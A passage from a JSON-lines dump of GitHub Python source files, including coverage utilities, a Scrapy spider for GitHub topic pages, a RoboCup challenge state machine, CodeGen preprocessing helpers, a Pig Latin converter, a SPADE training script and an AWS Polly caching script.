source_id,\n Build.status == Status.finished\n ).order_by(Build.date_created.desc()).first()\n if b_id:\n newest_build_ids.add(b_id[0])\n\n return get_coverage_by_build_ids(newest_build_ids)\n\n\ndef get_coverage_by_build_id(build_id):\n return get_coverage_by_build_ids([build_id])\n\n\ndef get_coverage_by_build_ids(build_ids):\n \"\"\"\n Returns the coverage associated with some builds.\n\n The dictionary maps file names to a string of the form 'UNCCCNCU', where U means\n 'uncovered', C means 'covered' and 'N' means 'no coverage info'.\n \"\"\"\n if not build_ids:\n return {}\n\n all_job_ids = db.session.query(Job.id).filter(\n Job.build_id.in_(build_ids)\n )\n\n return get_coverage_by_job_ids(all_job_ids)\n\n\ndef get_coverage_by_job_ids(job_ids):\n \"\"\"\n Returns the coverage associated with some jobs.\n\n The dictionary maps file names to a string of the form 'UNCCCNCU', where U means\n 'uncovered', C means 'covered' and 'N' means 'no coverage info'.\n \"\"\"\n if not job_ids:\n return {}\n\n return FileCoverage.query.filter(\n FileCoverage.job_id.in_(job_ids)\n )\n\n\ndef merge_coverage(old, new):\n # type: (str, str) -> str\n \"\"\"Merge two coverage strings.\n\n Each of the arguments is compact coverage data as described for\n get_coverage_by_job_ids(), and so is the return value.\n\n The merged string contains the 'stronger' or the two corresponding\n characters, where 'C' defeats 'U' and both defeat 'N'.\n \"\"\"\n cov_data = []\n for lineno in range(max(len(old), len(new))):\n try:\n old_cov = old[lineno]\n except IndexError:\n old_cov = 'N'\n\n try:\n new_cov = new[lineno]\n except IndexError:\n new_cov = 'N'\n\n if old_cov == 'C' or new_cov == 'C':\n cov_data.append('C')\n elif old_cov == 'U' or new_cov == 'U':\n cov_data.append('U')\n else:\n cov_data.append('N')\n return ''.join(cov_data)\n\n\ndef merged_coverage_data(coverages):\n # type: (Iterable[FileCoverage]) -> Dict[str, str]\n \"\"\"Return a dict of merged coverage data by filename.\n\n The argument is an iterable of FileCoverage instances. The return\n value is a dict mapping filenames to the merged coverage data in\n the form as described for get_coverage_by_job_ids().\n \"\"\"\n coverage = {} # type: Dict[str, str]\n for c in coverages:\n data = coverage.get(c.filename)\n if data:\n data = merge_coverage(data, c.data)\n else:\n data = c.data\n coverage[c.filename] = data\n return coverage\n\n\nCoverageStats = NamedTuple(\n 'CoverageStats',\n [('lines_covered', int),\n ('lines_uncovered', int),\n ('diff_lines_covered', int),\n ('diff_lines_uncovered', int)])\n\n\ndef get_coverage_stats(diff_lines, data):\n # type: (Set[int], str) -> CoverageStats\n \"\"\"Return a tuple of coverage stats.\"\"\"\n\n lines_covered = 0\n lines_uncovered = 0\n diff_lines_covered = 0\n diff_lines_uncovered = 0\n\n for lineno, code in enumerate(data):\n # lineno is 1-based in diff\n line_in_diff = bool((lineno + 1) in diff_lines)\n if code == 'C':\n lines_covered += 1\n if line_in_diff:\n diff_lines_covered += 1\n elif code == 'U':\n lines_uncovered += 1\n if line_in_diff:\n diff_lines_uncovered += 1\n\n return CoverageStats(lines_covered, lines_uncovered, diff_lines_covered, diff_lines_uncovered)\n","repo_name":"dropbox/changes","sub_path":"changes/lib/coverage.py","file_name":"coverage.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":758,"dataset":"github-code","pt":"72"} +{"seq_id":"13258842344","text":"#\n#\n#\n\ndef my_range(*args):\n start = 0\n stop = 1\n try:\n if len(args) == 1:\n stop = args[0]\n elif len(args) == 2:\n start = args[0]\n stop = args[1]\n\n while start < stop:\n yield start\n start += 1\n\n except Exception as err:\n print(err)\n\n\ntype(my_range()) # \n\nmy_list = my_range(1)\nfor i in my_list:\n print(i)\n\n# 0\n\ntype(my_list) # \n\nmy_list = my_range(1, 5)\nfor i in my_list:\n print(i)\n\n# 1\n# 2\n# 3\n# 4\n\nmy_list = my_range(4)\nfor i in my_list:\n print(i)\n\n# 0\n# 1\n# 2\n# 3\n\n\nfor num in my_range(1, 6):\n print(num)\n\n# 1\n# 2\n# 3\n# 4\n# 5\n\n\nnew_gen = (num for num in range(3, 6))\n\ntype(new_gen) # \n\nfor x in new_gen:\n print(x)\n","repo_name":"arif-eker/python_workspace","sub_path":"lecture_2/iterators_generators/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43038153969","text":"import scrapy\r\nimport time\r\nimport json\r\n\r\n\r\nclass JsonWriterPipeline:\r\n def open_spider(self, spider):\r\n self.file = open(\"github.jl\", \"w\", encoding='utf-8')\r\n\r\n def close_spider(self, spider):\r\n self.file.close()\r\n\r\n def process_item(self, item, spider):\r\n line = json.dumps(item)\r\n self.file.write(f\"{line}\\n\")\r\n return item\r\n\r\n\r\n\r\n# Gajesh Bhat, https://gist.github.com/gajeshbhat/67a3db79a6aecd1db42343190f9a2f17\r\ndef convert_str_to_number(x):\r\n if x:\r\n total_nums = 0\r\n num_map = {\"K\": 1000, \"M\": 1000000, \"B\": 1000000000}\r\n if x.isdigit():\r\n total_nums = int(x)\r\n else:\r\n if len(x) > 1:\r\n total_nums = float(x[:-1]) * num_map.get(x[-1].upper(), 1)\r\n return int(total_nums)\r\n else:\r\n return 0\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass GitpySpider(scrapy.Spider):\r\n name = \"gitpySpider\"\r\n allowed_domains = ['github.com']\r\n custom_settings = {\r\n \"ITEM_PIPELINES\": {JsonWriterPipeline: 401},\r\n \"CONCURRENT_REQUESTS\": 1,\r\n \"DOWNLOAD_TIMEOUT\": 1800,\r\n # 'LOG_LEVEL': 'DEBUG',\r\n # 'LOG_FILE': 'log_%s.txt' % time.time(), # 配置的日志\r\n }\r\n\r\n\r\n def start_requests(self):\r\n urls = [\"http://github.com/topics/python?page=1\"]\r\n for url in urls:\r\n yield scrapy.Request(url=url, callback=self.parse)\r\n\r\n\r\n def parse(self, response):\r\n\r\n article = response.css(\"article.color-bg-secondary\")\r\n for i, repos in enumerate(article):\r\n user, proj = repos.css(\"h3 a::text\").getall()[:2] # 用户和项目名称\r\n star = repos.css(\"a.social-count::text\").get()\r\n primary = repos.css(\"div.color-bg-primary.rounded-bottom-1\")\r\n about = primary.css(\"div.px-3.pt-3 div::text\").get()\r\n\r\n proj_page = repos.css(\"h3 a[data-ga-click='Explore, go to repository, location:explore feed']::attr(href)\").get()\r\n proj_page_link = f\"http://github.com{proj_page}\"\r\n\r\n item = dict({\r\n \"user\": user and user.strip(), # 上传者\r\n \"proj\": proj and proj.strip(), # 项目名\r\n \"star\": star and convert_str_to_number(star.strip()), # 收藏数\r\n \"proj_page_link\": f\"http://github.com{proj_page}\", # 项目地址\r\n \"about\": about and about.strip(), # 项目简介\r\n })\r\n\r\n yield scrapy.Request(url=proj_page_link, callback=self.parse_proj, cb_kwargs=dict(quote=item)) # 进入项目详情页\r\n\r\n time.sleep(1)\r\n next_page = response.css(\"body main form.ajax-pagination-form.js-ajax-pagination input::attr(value)\").get()\r\n if next_page: # 翻页\r\n next_url = f\"http://github.com/topics/python?page={next_page}\"\r\n yield scrapy.Request(url=next_url, callback=self.parse)\r\n\r\n\r\n\r\n\r\n\r\n def parse_proj(self, response, quote): # 进入项目页爬取信息\r\n\r\n def extract_with_css(query):\r\n return response.css(query).get(default='').strip()\r\n\r\n def extract_with_allcss(query): # 获取所有元素\r\n return list(map(str.strip, response.css(query).getall()))\r\n\r\n def extract_with_allcss_zip(query): # 打包键值对(用于爬取语言组成)\r\n kv = response.css(query).getall()\r\n if kv:\r\n keys = []\r\n values = []\r\n for i in range(0, len(kv), 2):\r\n keys.append(kv[i])\r\n values.append(kv[i + 1])\r\n return list(zip(map(str.strip, keys), map(str.strip, values)))\r\n else:\r\n return []\r\n\r\n Readme_text = extract_with_css(\"article[class='markdown-body entry-content container-lg']::text\")\r\n fork_num = extract_with_css(\"body main ul li a[href$='network/members']::text\")\r\n Releases_num = extract_with_css(\"h2[data-pjax^='#repo'] a span[data-view-component='true']::text\")\r\n branches_num = extract_with_css(\"a[href$='branches'] strong::text\")\r\n Contributors_num = extract_with_css(\"div[class='BorderGrid-cell'] h2 a[href$='contributors'] span::text\")\r\n\r\n quote.update(\r\n {\r\n \"Readme\": Readme_text, # Readme\r\n \"fork\": convert_str_to_number(fork_num), # 复刻数\r\n \"Releases\": convert_str_to_number(Releases_num), # 发行数\r\n \"branches\": branches_num, # 分支数\r\n \"Contributors\": Contributors_num, # 贡献者数量\r\n \"toptags\": extract_with_allcss(\"div[class='f6'] a[data-ga-click='Topic, repository page']::text\"), # 主题标\r\n \"Languages\": extract_with_allcss_zip(\"ul[class='list-style-none'] a[class^='d-inline'] span::text\"), # 语言构成\r\n\r\n }\r\n )\r\n time.sleep(1)\r\n issues_page_link = f\"{quote['proj_page_link']}/issues\"\r\n yield scrapy.Request(url=issues_page_link, callback=self.parse_proj_issues, cb_kwargs=dict(quote=quote))\r\n\r\n\r\n def parse_proj_issues(self, response, quote):\r\n def extract_with_css(query):\r\n res = response.css(query).getall()\r\n if res:\r\n return res[-1].split()[0].strip() # 去除多余部分,只取出数字\r\n else:\r\n return 0\r\n\r\n quote.update(\r\n {\r\n \"issues_open_num\": extract_with_css(\"div[class$='no-wrap'] div[class^='table-list-header'] a[data-ga-click$='Open']::text\"), # 开放议题数\r\n \"issues_closed_num\": extract_with_css(\"div[class$='no-wrap'] div[class^='table-list-header'] a[data-ga-click$='Closed']::text\") # 关闭议题数\r\n }\r\n )\r\n time.sleep(1)\r\n pulls_page_link = f\"{quote['proj_page_link']}/pulls\"\r\n yield scrapy.Request(url=pulls_page_link, callback=self.parse_proj_pulls, cb_kwargs=dict(quote=quote))\r\n\r\n\r\n def parse_proj_pulls(self, response, quote):\r\n def extract_with_css(query):\r\n res = response.css(query).getall()\r\n if res:\r\n return res[-1].split()[0].strip() # 去除多余部分,只取出数字\r\n else:\r\n return 0\r\n\r\n quote.update(\r\n {\r\n \"pulls_open_num\": extract_with_css(\"div[class^='d-block'] a[href$='pr']::text\"), # 开放拉取请求数\r\n \"pulls_closed_num\": extract_with_css(\"div[class^='d-block'] a[href$='closed']::text\") # 关闭拉取请求数\r\n }\r\n )\r\n time.sleep(1)\r\n dependency_page_link = f\"{quote['proj_page_link']}/network/dependencies\"\r\n yield scrapy.Request(url=dependency_page_link, callback=self.parse_proj_dependency, cb_kwargs=dict(quote=quote))\r\n\r\n\r\n def parse_proj_dependency(self, response, quote):\r\n def extract_with_allcss(query): # 获取所有元素\r\n return list(map(str.strip, response.css(query).getall()))\r\n\r\n quote.update(\r\n {\r\n \"dependency\": extract_with_allcss(\"div[class^='Box-row'] span a span::text\") # 依赖项\r\n }\r\n )\r\n print(f\"***************************************** 项目'{quote['proj']}'已爬取完毕 *****************************************\")\r\n yield quote\r\n\r\n\r\n\r\n\r\n\r\nfrom scrapy.crawler import CrawlerProcess\r\n\r\nprocess = CrawlerProcess()\r\nprocess.crawl(GitpySpider)\r\nprocess.start()\r\n\r\n","repo_name":"AkiiLucky/Python_notes","sub_path":"爬虫/Scrapy框架/Gitpy_Spider.py","file_name":"Gitpy_Spider.py","file_ext":"py","file_size_in_byte":7721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28520390746","text":"import time\nfrom enum import Enum\nfrom aux.utils import red_print, blue_print, green_print, purple_print\nfrom aux.GCSocket import GCCommands\n\nfrom aux.hw_challenge_1 import Challenge_1\nfrom aux.hw_challenge_2 import Challenge_2\nfrom aux.hw_challenge_3 import Challenge_3\nfrom aux.hw_challenge_4 import Challenge_4\nfrom aux.tc_ball_placement import BallPlacement\n\nfrom aux.challenge_aux import ChallengeSteps, ChallengeEvents, Action\n\nROBOT_STOP_TRESHOLD = 5 # in seconds\nMAX_CHALLENGES = 5\n\n\nclass ChallengeFSM(object):\n def __init__(self):\n self.current_step = ChallengeSteps.STEP_0\n self.current_challenge = None\n self.challenge_end_callback = None\n self.current_action = Action()\n\n # Used when time needs to be counted\n self.dt_cmd = [0, 0]\n self.dt_chl = [0, 0]\n\n def challenge_external_event(self, event: ChallengeEvents):\n if event == ChallengeEvents.GOAL and self.current_challenge.id in [1, 2]:\n dt = self.dt_cmd[1] - self.dt_cmd[0]\n if dt > 1:\n self.finish_challenge()\n\n elif event == ChallengeEvents.ROBOT_STOPPED and self.current_challenge.id == 3:\n self.finish_challenge()\n\n elif event == ChallengeEvents.STOP and self.current_challenge.id == 5:\n dt = self.dt_cmd[1] - self.dt_cmd[0]\n if dt > 1 and self.current_step == ChallengeSteps.STEP_4:\n purple_print('\\nStop!')\n self.finish_challenge()\n\n def finish_challenge(self):\n self.proceed_step()\n blue_print('\\nFinish Challenge!')\n\n if self.current_step == ChallengeSteps.STEP_0 and \\\n self.challenge_end_callback != None:\n self.dt_chl[1] = time.time_ns() / 1e9\n\n blue_print('Stop challenge timer!')\n\n self.challenge_end_callback()\n\n def set_challenge(self, challenge: int):\n self.current_step = ChallengeSteps.STEP_1\n self.dt_chl = [0, 0]\n\n if not isinstance(challenge, int) or \\\n (challenge < 1 or challenge > MAX_CHALLENGES):\n raise ValueError(\n f'Challenge ID must be between 1 and {MAX_CHALLENGES}!')\n\n if challenge == 1:\n self.current_challenge = Challenge_1\n elif challenge == 2:\n self.current_challenge = Challenge_2\n elif challenge == 3:\n self.current_challenge = Challenge_3\n elif challenge == 4:\n self.current_challenge = Challenge_4\n elif challenge == 5:\n self.current_challenge = BallPlacement\n\n green_print('[CHALLENGE FSM] Challenge {} set!'.format(challenge))\n\n def set_end_callback(self, callback_fn=None):\n if callback_fn != None:\n self.challenge_end_callback = callback_fn\n green_print('[CHALLENGE FSM] Callback set!')\n\n def proceed_step(self):\n next_step = ChallengeSteps.next_step(self.current_step)\n\n if next_step.value <= self.current_challenge.max_steps:\n self.current_step = next_step\n else:\n self.current_step = ChallengeSteps.STEP_0\n\n def get_challenge_time(self):\n ch_time = self.dt_chl[1] - self.dt_chl[0]\n if self.current_challenge.id == 3:\n ch_time = ch_time - ROBOT_STOP_TRESHOLD\n return ch_time\n\n def get_current_command(self) -> GCCommands:\n action = self.current_challenge.Step(self.current_step)\n timer_ended = False\n\n if action.timer != 0 and self.dt_cmd == [0, 0]:\n self.dt_cmd[0] = time.time_ns() / 1e9\n self.dt_cmd[1] = time.time_ns() / 1e9\n\n elif action.timer != 0 and self.dt_cmd[0] > 0:\n self.dt_cmd[1] = time.time_ns() / 1e9\n\n dt = self.dt_cmd[1] - self.dt_cmd[0]\n print('Challenge time = {:.2f}/{} s'.format(dt, action.timer),\n end='\\r')\n\n if dt >= action.timer:\n timer_ended = True\n self.dt_cmd = [0, 0]\n\n if action.command != GCCommands.NONE or timer_ended:\n if action.start_timer and self.dt_chl[0] == 0:\n self.dt_chl[0] = time.time_ns() / 1e9\n blue_print('Starting challenge timer...')\n\n self.proceed_step()\n\n if self.current_step == ChallengeSteps.STEP_0 and \\\n self.challenge_end_callback != None:\n self.dt_chl[1] = time.time_ns() / 1e9\n\n if timer_ended:\n blue_print('\\nStop challenge timer - Timeout =(!')\n else:\n blue_print('\\nStop challenge timer - Completed =)!')\n\n self.challenge_end_callback()\n\n return action.command\n","repo_name":"RoboCup-SSL/ssl-hardware-challenge-tool","sub_path":"src/aux/hw_challenge_fsm.py","file_name":"hw_challenge_fsm.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"17815600221","text":"import argparse\nimport json\nimport random\nimport subprocess\nfrom pathlib import Path\nfrom logging import getLogger\n\nfrom codegen_sources.model.preprocess import XLM_preprocess\nimport typing as tp\n\n\nPathLike = tp.Union[str, Path]\n\nREPO_ROOT = str(Path(__file__).parents[2])\n\nFALSY_STRINGS = {\"off\", \"false\", \"0\"}\nTRUTHY_STRINGS = {\"on\", \"true\", \"1\"}\n\nlogger = getLogger()\n\n\ndef bool_flag(s):\n \"\"\"\n Parse boolean arguments from the command line.\n \"\"\"\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"Invalid value for a boolean flag!\")\n\n\ndef is_valid_file(filepath: tp.Optional[PathLike]) -> bool:\n if filepath is None:\n return False\n if isinstance(filepath, str):\n filepath = Path(filepath)\n else:\n assert isinstance(filepath, Path)\n return filepath.is_file() and filepath.stat().st_size > 0\n\n\ndef get_nlines(file_path):\n assert file_path.is_file(), file_path\n process = subprocess.run(\n f\"wc -l {file_path}\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n assert process.returncode == 0\n out = process.stdout.decode()\n return int(out.lstrip().split(\" \")[0])\n\n\ndef check_same_number_of_lines(file_path1, file_path2):\n nlines1 = get_nlines(file_path1)\n nlines2 = get_nlines(file_path2)\n assert (\n nlines1 == nlines2\n ), f\"{file_path1} contains {nlines1} examples vs {file_path2}: {nlines2} examples\"\n\n\ndef head(file_path, n):\n n = int(n)\n with file_path.open(\"r\", encoding=\"utf-8\") as f:\n h = [next(f) for i in range(n)]\n return h\n\n\ndef get_subset_file(file_paths: tp.List[Path], subset_size_gb: int, output_path: Path):\n \"\"\"\n Return one file containing a subset of files file_paths.\n The subset is of size subset_size_gb.\n The subset contains an equal portion on all files.\n \"\"\"\n if output_path.is_file():\n return f\"{output_path}\"\n for file_path in file_paths:\n size_gb = file_path.stat().st_size / 1024 ** 3\n n_lines = get_nlines(file_path)\n subset_n_lines = int((subset_size_gb / len(file_paths)) * (n_lines / size_gb))\n process = subprocess.run(\n f\"head -q -n {subset_n_lines} {file_path} >> {output_path}\",\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n executable=\"/bin/bash\",\n )\n assert process.returncode == 0\n logger.info(\n f\"Subset of {[f.name for f in file_paths]} created at: {output_path.name}. Size=({output_path.stat().st_size / 1024 ** 3:.2f}GB).\"\n )\n shuf_file(output_path)\n return f\"{output_path}.shuf\"\n\n\ndef truncate_files(file_paths):\n all_lines = []\n for f in file_paths:\n with f.open(\"r\", encoding=\"utf-8\") as f:\n lines = f.readlines()\n all_lines.append(lines)\n mini = min([len(lines) for lines in all_lines])\n for f, i in enumerate(file_paths):\n if len(all_lines[i]) > mini:\n with f.open(\"w\", encoding=\"utf-8\") as f:\n for j in range(mini):\n f.write(all_lines[i][j])\n\n\ndef write_head(file_path, n):\n n = int(n)\n with file_path.open(\"r\", encoding=\"utf-8\") as f:\n h = [next(f) for i in range(n)]\n with file_path.open(\"w\", encoding=\"utf-8\") as f:\n f.write(\"\".join(h))\n return h\n\n\ndef shuf_file(file_path):\n process = subprocess.run(\n f\"shuf {file_path} -o {file_path}.shuf\",\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n assert (\n process.returncode == 0\n ), f\"failed to shuffle {file_path}\\n Error {process.stderr.decode()}\"\n\n\ndef get_all_pairs(items):\n return [\n (items[i], items[j])\n for i in range(len(items))\n for j in range(i + 1, len(items))\n ]\n\n\ndef shuf_parallel_files(file_paths: tp.List[PathLike]) -> None:\n lines_order: tp.List[int] = []\n for input_path in file_paths:\n input_path = Path(input_path)\n with input_path.open(\"r\", encoding=\"utf8\") as f:\n lines = f.readlines()\n if not lines_order:\n lines_order = list(range(len(lines)))\n random.shuffle(lines_order)\n random.shuffle(lines_order)\n\n if len(lines_order) != len(lines):\n raise RuntimeError(\n f\"files with different number of lines in {file_paths} \"\n f\"({len(lines_order)} and {len(lines)})\"\n )\n reordered = [lines[i] for i in lines_order]\n with open(f\"{input_path}.shuf\", \"w\", encoding=\"utf8\") as f:\n f.writelines(reordered)\n\n\ndef get_repo_to_group_dict(repo_groups_path):\n repo_groups = open(repo_groups_path, \"r\").read().strip()\n repo_groups_dict = json.loads(repo_groups)\n repo_to_group = dict()\n for k, values in repo_groups_dict.items():\n for v in values:\n assert v not in repo_to_group\n repo_to_group[v] = k\n return repo_to_group\n\n\ndef binarize_for_XLM_file(file_path, vocab):\n assert get_nlines(file_path) > 0\n return XLM_preprocess(str(vocab), str(file_path), str(file_path) + \".pth\")\n\n\ndef create_symlink(file_path, symlink):\n if isinstance(file_path, str):\n file_path = Path(file_path)\n if isinstance(symlink, str):\n symlink = Path(symlink)\n assert (\n file_path.is_file() or symlink.parent.joinpath(file_path).resolve().is_file()\n ), f\"{file_path} is not a file: resolved into {symlink.parent.joinpath(file_path).resolve()}\"\n assert not symlink.is_file(), f\"{symlink} already exists\"\n process = subprocess.run(\n f\"ln -s {file_path} {symlink}\",\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n assert (\n symlink.is_file() and process.returncode == 0\n ), f\"failed to create symlink {symlink} for file {file_path} \"\n\n\ndef matched(str):\n count = 0\n is_in_string = False\n string_char = \"\"\n previous_char = \"\"\n for i, c in enumerate(str):\n if is_in_string:\n if c == string_char and (\n previous_char != \"\\\\\" or (i >= 2 and str[i - 2] == \"\\\\\")\n ):\n is_in_string = False\n previous_char = c\n continue\n if c == \"(\":\n count += 1\n elif c == \")\":\n count -= 1\n if count < 0:\n return False\n if c == '\"' or c == \"'\":\n is_in_string = True\n string_char = c\n return count == 0\n\n\ndef split_arguments(s):\n open_parentheses = {\"[\", \"{\", \"(\"}\n close_parentheses = {\"]\", \"}\", \")\"}\n s = s.strip()\n while s.startswith(\"(\") and s.endswith(\")\") and matched(s[1:-1]):\n s = s[1:-1]\n parenth_count = 0\n arguments = [[]]\n is_in_string = False\n string_char = \"\"\n previous_char = \"\"\n for i, c in enumerate(s):\n if is_in_string:\n arguments[-1].append(c)\n if c == string_char and (\n previous_char != \"\\\\\" or (i >= 2 and s[i - 2] == \"\\\\\")\n ):\n is_in_string = False\n previous_char = c\n continue\n if c in open_parentheses:\n parenth_count += 1\n if c in close_parentheses:\n parenth_count -= 1\n if c == \",\" and parenth_count == 0:\n arguments.append([])\n else:\n arguments[-1].append(c)\n previous_char = c\n if c == '\"' or c == \"'\":\n is_in_string = True\n string_char = c\n\n assert parenth_count == 0, (parenth_count, s)\n return [\"\".join(chars) for chars in arguments]\n","repo_name":"facebookresearch/CodeGen","sub_path":"codegen_sources/preprocessing/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7659,"program_lang":"python","lang":"en","doc_type":"code","stars":617,"dataset":"github-code","pt":"72"} +{"seq_id":"30736148946","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'), \n #finch\n path('finches/', views.finches_index, name='finches_index'), \n path('finches/create/', views.FinchCreate.as_view(), name='finches_create'),\n path('finches//', views.finches_detail, name='finches_detail'),\n path('finches//update/', views.FinchUpdate.as_view(), name='finches_update'), \n path('finches//delete/', views.FinchDelete.as_view(), name='finches_delete'),\n #feeding\n path('finches//add_feeding', views.add_feeding, name='add_feeding'),\n #toy\n path('finches//assoc_toy//', views.assoc_toy, name='assoc_toy'),\n path('finches//unassoc_toy//', views.unassoc_toy, name='unassoc_toy'),\n path('toys/', views.ToyList.as_view(), name='toys_index'),\n path('toys//', views.ToyDetail.as_view(), name='toys_detail'),\n path('toys/create/', views.ToyCreate.as_view(), name='toys_create'),\n path('toys//uptdate/', views.ToyUpdate.as_view(), name='toys_update'),\n path('toys//delete/', views.ToyDelete.as_view(), name='toys_delete'),\n #sign up\n path('accounts/signup/', views.signup, name='signup'),\n]\n\n","repo_name":"mymy209/finch-collector","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26395804448","text":"#BABATUNDE IDAHOR\n#PROJECT_4\n#COURSE : CS133\n#TERM: FALL 2015\n\n\n##This program translates an English word or phrase and translate it into Pig Latin using a Pig Latin translator. \n\nprint ('Welcome to the Pig Latin Converter')\n\n\nplayAgain = 'yes'\nwhile playAgain.lower() == 'yes':\n try: #Exception handler\n phrase = input(\"Enter an English word or phrase: \")\n print('------------------ OUTPUT ----------------------------------'+ '\\n')\n \n\n wordList =list() #creates the 1st new list\n wordList2 = list() #creates the 2nd new list\n symbol = \"!@#$%^&*()?.\" #stores special symbol\n latin_suffix ='AY' # latin suffix to be added to the end of the word.\n \n wordList.append(phrase) # adds the word to the list\n split_word = phrase.split(' ') # separates each word\n \n display='' #used to convert string of words in the list into a string.\n \n \n # Loops over the list of each word appending the letters AY to each letter.\n for i in range(0, len(split_word)):\n wordList2 = split_word[i]\n oldWord = wordList2\n new_word = oldWord\n for s in symbol:\n new_word = new_word.strip(s)\n\n new_word = new_word[1:] + new_word[0] + latin_suffix # Word or phrase arrangement\n if not new_word.isalpha():\n raise Exception(\"Not a valid input!! Only words or phrases are allowed\") # return the exceptions to the user.\n \n # appends the symbols back to phrase or word.\n for s in symbol:\n if s in oldWord:\n new_word = new_word + s\n \n new_word = new_word + ' '\n display += new_word\n \n # prints out the phrases or word in uppper case\n print('English Word: '+ phrase.upper()+'.')\n print('Pig Latin Word: '+ display.upper()+'.' )\n except Exception as e:\n print(e)\n\n playAgain = \"\"\n while(playAgain != \"yes\" and playAgain != \"no\"):\n playAgain = input(\"Play Again..? : \").lower()\n","repo_name":"bidahor13/Python_projects","sub_path":"P4/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35558339879","text":"import sys\nfrom collections import OrderedDict\nfrom options.train_options import TrainOptions\nimport data\nfrom util.iter_counter import IterationCounter\nfrom util.gm_visualizer import Visualizer\nfrom trainers.pix2pix_trainer import Pix2PixTrainer\nimport torch\nimport time\n\n###\n# 시간 체크\nstart_time=time.time()\n\n\n# parse options\nopt = TrainOptions().parse()\n\n# print options to help debugging\nprint(' '.join(sys.argv))\n\n# load the dataset\ndataloader = data.create_dataloader(opt)\n\n# create trainer for our model\ntrainer = Pix2PixTrainer(opt)\n\n# create tool for counting iterations\niter_counter = IterationCounter(opt, len(dataloader))\n\n# # create tool for visualization\nvisualizer = Visualizer(opt)\n\nbase_epoch=50\nfor epoch in iter_counter.training_epochs():\n iter_counter.record_epoch_start(epoch)\n for i, data_i in enumerate(dataloader, start=iter_counter.epoch_iter):\n iter_counter.record_one_iteration()\n \n # Training\n\n if i % opt.D_steps_per_G == 0:\n trainer.run_generator_one_step(data_i)\n trainer.run_discriminator_one_step(data_i)\n \n\n if not opt.skip_losses: # Loss 추이 출력 - 학습 20~25% 느려짐\n if epoch % opt.print_freq == 0:\n losses = trainer.get_latest_losses()\n visualizer.print_current_errors(epoch, losses) \n else: # loss 추이 출력 안 할때는 그냥 학습이 잘 되고있는지만 출력.\n if epoch % 10 ==0:\n mid_time=time.time()\n print('End of epoch %d / %d \\t Time Taken(Total): %d sec' %\n (epoch, opt.niter, mid_time-start_time))\n \n if iter_counter.needs_displaying():\n visuals = OrderedDict([('input_label', data_i['label']),\n ('synthesized_image', trainer.get_latest_generated()),\n ('real_image', data_i['image'])])\n visualizer.display_current_results(visuals, epoch, iter_counter.total_steps_so_far)\n\n# trainer.update_learning_rate(epoch)\n \n\n if epoch == opt.niter:\n print('Training was successfully finished.')\n print('saving the model at %d_net_G(D).pth' % (epoch))\n trainer.save(epoch)\n\nend_time=time.time()\n\nprint('Time for %d iterations : %d sec' %(opt.niter-50, end_time-start_time))","repo_name":"sjinu96/ITOMAI","sub_path":"SPADE/gm_train.py","file_name":"gm_train.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"71863454632","text":"\"\"\"Speech synthesis with AWS Polly.\n\nText is chunked into sentences or even words which are cached individually.\nThis way, this script can be used offline once all sentences/words are cached.\n\nThis will happen faster when using words, since words can be recombined\nto support other sentences as well.\n\nOn the other hand, chunking into sentences will produce better results,\nas passing entire sentences to AWS enables it to produce results\nwith the correct sentence intonation and word spacing.\n\nPCM format is used so that content can be assembled from various (cached) files easily.\n\nThe PCM data returned from AWS is in a signed 16-bit, 1 channel, little-endian format.\n\nOn Linux, if ffmpeg is installed these pcm files can be played with:\n> ffplay -f s16le -ar 16000 -ac 1 file.pcm\n\nOn ubuntu, to use pyaudio you might have to install portaudio19-dev.\n\"\"\"\n\nimport os\nimport sys\nimport unicodedata\nimport uuid\nimport boto3\nimport time\nimport sqlite3\nimport appdirs\nimport logging\nimport datetime\nimport nltk\nimport pyaudio\n\n\nlogger = logging.getLogger(__name__)\n\ndata_dir = appdirs.user_data_dir('python-polly')\n\ndownload_dir = os.path.join(data_dir, 'download')\nos.makedirs(download_dir, exist_ok=True)\n\ndb_path = os.path.join(data_dir, 'polly.db')\nos.makedirs(os.path.dirname(db_path), exist_ok=True)\n\n\npolly_client = boto3.Session().client('polly')\n\npunctuation = ''.join(chr(i) for i in range(sys.maxunicode)\n if unicodedata.category(chr(i)).startswith('P'))\n\n\ndef get_db():\n db = sqlite3.connect(db_path)\n db.row_factory = sqlite3.Row\n return db\n\n\ndef ensure_requests_table():\n sql = \"\"\"create table if not exists polly_requests (\n id integer primary key,\n voice text,\n format text,\n text text,\n date text,\n path text\n )\n \"\"\"\n with get_db() as db:\n db.execute(sql)\n\n\ndef setup_db():\n ensure_requests_table()\n\n\ndef save_stream(s, filename):\n with open(filename, 'wb') as f:\n f.write(s.read())\n\n\ndef synthesize_with_aws(text, voice, format):\n response = polly_client.synthesize_speech(VoiceId=voice, OutputFormat=format,\n Text=text)\n return response['AudioStream']\n\n\ndef find_request(text, voice, format):\n db = get_db()\n return db.execute(\"\"\"select path from polly_requests\n where voice = ? and format = ? and text = ?\"\"\",\n (voice, format, text)).fetchone()\n\n\ndef save_request(text, 